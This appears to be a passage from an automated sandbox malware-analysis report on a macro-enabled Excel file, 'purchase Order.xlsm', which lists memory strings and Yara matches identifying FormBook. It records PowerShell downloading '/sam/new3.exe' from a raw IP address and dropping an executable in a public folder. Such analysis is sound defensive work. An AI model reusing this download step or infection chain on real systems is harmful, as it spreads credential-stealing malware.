Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000001.00000002.358997121.0000000004DD2000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp String found in binary or memory: https://go.micros
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://graph.windows.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://graph.windows.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://login.windows.local
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://management.azure.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://management.azure.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://messaging.office.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://officeapps.live.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://onedrive.live.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://osi.office.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office365.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://roaming.edog.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://settings.outlook.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://tasks.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: eVJOpc.exe, 00000008.00000002.372343961.00000000006CA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 8_2_00404FC2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Found detection on Joe Sandbox Cloud Basic with higher score
Source: purchase Order.xlsm Joe Sandbox Cloud Basic: Detection: malicious Score: 64 Perma Link
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe Jump to dropped file
Yara signature match
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
